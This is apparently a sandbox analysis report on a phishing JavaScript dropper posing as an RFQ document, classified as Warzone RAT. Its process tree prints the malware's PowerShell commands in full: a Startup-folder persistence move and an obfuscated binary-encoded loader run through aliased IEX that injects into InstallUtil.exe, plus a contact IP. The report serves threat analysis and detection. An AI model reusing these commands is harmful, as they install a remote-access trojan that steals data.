Overview

overview

10

Static

static

RFQ scope ...nts.js

windows7-x64

10

RFQ scope ...nts.js

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    29-11-2022 10:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RFQ scope of requirements.js

  • Size

    2KB

  • MD5

    84ae648af28a2f5acd3c67fabde24615

  • SHA1

    45a9a2ddd9b5d8fedd6c5767cdb0bafb95c6d72b

  • SHA256

    c3db9d461440908e3278fda059adb00e9f546a3dd8dd38f80a6cee93372ae15d

  • SHA512

    7262173a3d69a54489b57087380e056b4f789343e9e0fe58efc5d0efbe1f166df44360bf1f9a2dba96b04afc5cac272cb3b262bd1eeda1c347131fa2db38468d

Score
10/10
warzoneratinfostealerrat

Malware Config

Signatures

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

    ratinfostealerwarzonerat
  • Warzone RAT payload 8 IoCs
    rat
  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 37 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1348
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" This page can’t be displayed This page can’t be displayed Make sure the web address http://104.223.67.151 is correct. Look for the page with your search engine. Refresh the page in a few minutes. Check that all network cables are plugged in. Verify that airplane mode is turned off. Make sure your wireless switch is turned on. See if you can connect to mobile broadband. Restart your router. Fix connection problems
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:584
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js' 'C:\Users\Admin\\AppData\\Roaming\\Microsoft\\Windows\Start Menu\Programs\Startup\'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      PID:1844
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function ermkflll { $o00=[char]105 + 'EX';sal P $o00 $gf=('55155155,51555151,51115515,51115515,51151111,51115515,51555551,51155511,51115155,51151551,51151111,51151115,51515555,51115515,51155151,51155115,51155151,51115515,51155151,51151115,51155511,51155151,55155555,55111151,55155555,55155111,51515511,51151551,51151155,51155151,51151115,51115155,51151155,51111551,51555511,51151111,51151115,51115155,51151551,51151115,51115151,51155151,55155111,55111511,55155155,51115155,55115151,55115115,51155115,51155111,55155555,55111151,55155555,51511511,51555151,51151115,51115151,51151151,51511151,55111515,55111515,51515155,51151111,51551111,51155515,51151515,51155151,51155511,51115155,55151555,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,51515155,51111551,51115555,51155151,51511151,55151155,55155555,55115511,55115555,55115111,55115515,55151551,55111511,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51115515,51115115,51151551,51155511,51155151,51515555,51151111,51151551,51151115,51115155,51551151,51155551,51151115,51155551,51155111,51155151,51115515,51511151,55111515,55111515,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,55155555,55111151,55155555,55155155,51115155,55115151,55115115,51155115,51155111,55111511,51555551,51155155,51155155,55151151,51515155,51111551,51115555,51155151,55155555,55151151,51555551,51115511,51115511,51155151,51151151,51155515,51151155,51111551,51551115,51155551,51151151,51155151,55155555,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55111511,51155155,51151111,55155555,51111511,55155155,51115555,51151551,51151115,51155111,55155555,55111151,55155555,51115155,51155151,51115511,51115155,55151151,51155511,51151111,51151115,51151115,51155151,51155511,51115155,51151551,51151111,51151115,55155555,55151151,51155511,51151111,51151151,51115555,55155555,51155111,51151111,51151111,51155111,51151155,51155151,55151115,51155511,51151111,51151151,55155555,55151151,51155511,51151111,51115151,51151115,51115155,55155555,55115551,55155555,55151151,51515551,51115151,51151551,51155151,51115155,51111151,55155555,51115151,51151115,51115155,51151551,51151155,55155555,55151555,55155155,51115555,51151551,51151115,51155111,55151551,55111511,55155155,51115155,51115155,51111551,55111151,51515555,55151555,55155111,55151555,51551115,51155151,51115111,55151151,55155111,55151511,55155111,51551111,51155515,51151515,51155151,55155111,55151511,55155111,51155511,51115155,55155555,51551115,51155151,55155111,55151511,55155111,51115155,55151115,51515111,51155151,55155111,55151511,55155111,51155515,51555511,51151155,51151551,55155111,55151511,55155111,51155151,51151115,51115155,55151551,55155111,55151551,55111511,55155155,51151151,51115115,55111151,55155555,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51551551,51151115,51115155,51155151,51115515,51155551,51155511,51115155,51151551,51151111,51151115,51511151,55111515,55111515,51555511,51155551,51151155,51151155,51555515,51111551,51151115,51155551,51151151,51155151,55151555,55155155,51115155,51115155,51111551,55151155,55155111,51555155,51151111,51115111,51151115,55155111,55155555,55151511,55155555,55155111,51151155,51151111,51155551,51155155,55155111,55155555,55151511,55155555,55155111,51515511,51115155,51115515,55155111,55155555,55151511,55155555,55155111,51151551,51151115,51155111,55155111,55151155,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51555511,51155551,51151155,51151155,51515155,51111551,51115555,51155151,51511151,55111515,55111515,51551151,51155151,51115155,51151555,51151111,51155155,55151155,55155111,51151555,51115155,51115155,51115555,55155111,55155555,55151511,55155555,55155111,55111515,55151111,55151111,51151555,51115551,51151115,51115111,51151555,51155551,55151115,51111555,51111551,51111515,55151111,51115111,51115555,55151111,51115511,51151551,51155151,55151115,51151515,51115555,51155111,55155111,55151551,51111155,51515555'.replace('5','0')|IEX) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) } (('[syst' + 'em.Str' + 'ing]::Join('''', $gf)')|P)|P } ermkflll
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1908
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        3⤵
          PID:2028
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js' 'C:\Users\Admin\\AppData\\Roaming\\Microsoft\\Windows\Start Menu\Programs\Startup\'
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:968
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1272
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1272 CREDAT:275457 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:940
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1272 CREDAT:275466 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1784

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\5XVTRNSK.txt
      Filesize

      601B

      MD5

      186ee748b76ab09ded6c6ccb92c00bb6

      SHA1

      dab2d1912a9cd79b514453d2f0f6bf28dbd2bf64

      SHA256

      fcf5490a32f5bbec6d632f14ffeaa2b30ac4cd6cd9fc3103978ca869c3fb137d

      SHA512

      3660d729931e9062b7a59a32391d26a6e331d57d8d5c43a4e6170b0cfe1188f1a9c956a86e3119085371e3e410edf66899bca18a2c39c22989223e0589590ca6

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      4fadbdef82401b426ee3352c2e92e19e

      SHA1

      7863b3489ef119d620e16b66925595048492a5a6

      SHA256

      9ec67fe4fc2e7fb2861c070bac7d93bf60c82b0f4b0079d70a1426b0a9ff0335

      SHA512

      06a604f463e4c74d79c27b9ed26c75e2aab90b7d1c150b6d5931e58be84297e63fd3a9ae89f96b55e1058b4aea901ab1b9e9c22af712bdc178b4c43aa295b703

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      4fadbdef82401b426ee3352c2e92e19e

      SHA1

      7863b3489ef119d620e16b66925595048492a5a6

      SHA256

      9ec67fe4fc2e7fb2861c070bac7d93bf60c82b0f4b0079d70a1426b0a9ff0335

      SHA512

      06a604f463e4c74d79c27b9ed26c75e2aab90b7d1c150b6d5931e58be84297e63fd3a9ae89f96b55e1058b4aea901ab1b9e9c22af712bdc178b4c43aa295b703

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      4fadbdef82401b426ee3352c2e92e19e

      SHA1

      7863b3489ef119d620e16b66925595048492a5a6

      SHA256

      9ec67fe4fc2e7fb2861c070bac7d93bf60c82b0f4b0079d70a1426b0a9ff0335

      SHA512

      06a604f463e4c74d79c27b9ed26c75e2aab90b7d1c150b6d5931e58be84297e63fd3a9ae89f96b55e1058b4aea901ab1b9e9c22af712bdc178b4c43aa295b703

      Download Submit
    • \Users\Admin\AppData\Local\Temp\11d5600c-2bda-4d22-b1dc-d8a970181a72\AgileDotNetRT64.dll
      Filesize

      75KB

      MD5

      42b2c266e49a3acd346b91e3b0e638c0

      SHA1

      2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

      SHA256

      adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

      SHA512

      770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

      Download Submit
    • \Users\Admin\AppData\Local\Temp\784b3b15-2b8e-42df-b11e-ec70bb6ec5f0\AgileDotNetRT64.dll
      Filesize

      75KB

      MD5

      42b2c266e49a3acd346b91e3b0e638c0

      SHA1

      2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

      SHA256

      adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

      SHA512

      770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

      Download Submit
    • memory/584-87-0x000000000274B000-0x000000000276A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/584-59-0x000007FEF36F0000-0x000007FEF4113000-memory.dmp
      Filesize

      10.1MB

      Download
    • memory/584-66-0x0000000002744000-0x0000000002747000-memory.dmp
      Filesize

      12KB

      Download
    • memory/584-92-0x000000000274B000-0x000000000276A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/584-64-0x000007FEF2B90000-0x000007FEF36ED000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/584-91-0x0000000002744000-0x0000000002747000-memory.dmp
      Filesize

      12KB

      Download
    • memory/584-70-0x000000001B770000-0x000000001BA6F000-memory.dmp
      Filesize

      3.0MB

      Download
    • memory/584-86-0x0000000002744000-0x0000000002747000-memory.dmp
      Filesize

      12KB

      Download
    • memory/584-57-0x0000000000000000-mapping.dmp
      Download
    • memory/968-89-0x0000000002454000-0x0000000002457000-memory.dmp
      Filesize

      12KB

      Download
    • memory/968-88-0x000000000245B000-0x000000000247A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/968-78-0x000007FEF36F0000-0x000007FEF4113000-memory.dmp
      Filesize

      10.1MB

      Download
    • memory/968-80-0x000007FEF2B90000-0x000007FEF36ED000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/968-81-0x0000000002454000-0x0000000002457000-memory.dmp
      Filesize

      12KB

      Download
    • memory/968-72-0x0000000000000000-mapping.dmp
      Download
    • memory/968-90-0x000000000245B000-0x000000000247A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/968-82-0x000000001B760000-0x000000001BA5F000-memory.dmp
      Filesize

      3.0MB

      Download
    • memory/1348-56-0x000007FEFBAE1000-0x000007FEFBAE3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1348-55-0x0000000000120000-0x0000000000130000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1844-84-0x0000000002964000-0x0000000002967000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1844-60-0x0000000000000000-mapping.dmp
      Download
    • memory/1844-85-0x000000000296B000-0x000000000298A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/1844-69-0x000000001B800000-0x000000001BAFF000-memory.dmp
      Filesize

      3.0MB

      Download
    • memory/1844-63-0x000007FEF36F0000-0x000007FEF4113000-memory.dmp
      Filesize

      10.1MB

      Download
    • memory/1844-67-0x0000000002964000-0x0000000002967000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1844-65-0x000007FEF2B90000-0x000007FEF36ED000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/1908-68-0x0000000000000000-mapping.dmp
      Download
    • memory/1908-74-0x000007FEF36F0000-0x000007FEF4113000-memory.dmp
      Filesize

      10.1MB

      Download
    • memory/1908-76-0x000007FEF2B90000-0x000007FEF36ED000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/1908-93-0x0000000002494000-0x0000000002497000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1908-79-0x0000000002494000-0x0000000002497000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1908-95-0x000007FEF2A00000-0x000007FEF2B84000-memory.dmp
      Filesize

      1.5MB

      Download
    • memory/1908-112-0x0000000002494000-0x0000000002497000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1908-97-0x000000000249B000-0x00000000024BA000-memory.dmp
      Filesize

      124KB

      Download
    • memory/1908-83-0x000000000249B000-0x00000000024BA000-memory.dmp
      Filesize

      124KB

      Download
    • memory/1908-113-0x000000000249B000-0x00000000024BA000-memory.dmp
      Filesize

      124KB

      Download
    • memory/2028-98-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/2028-103-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/2028-104-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/2028-106-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/2028-108-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/2028-109-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/2028-110-0x000000000040B556-mapping.dmp
      Download
    • memory/2028-101-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/2028-99-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/2028-114-0x0000000074F41000-0x0000000074F43000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2028-115-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/2028-116-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download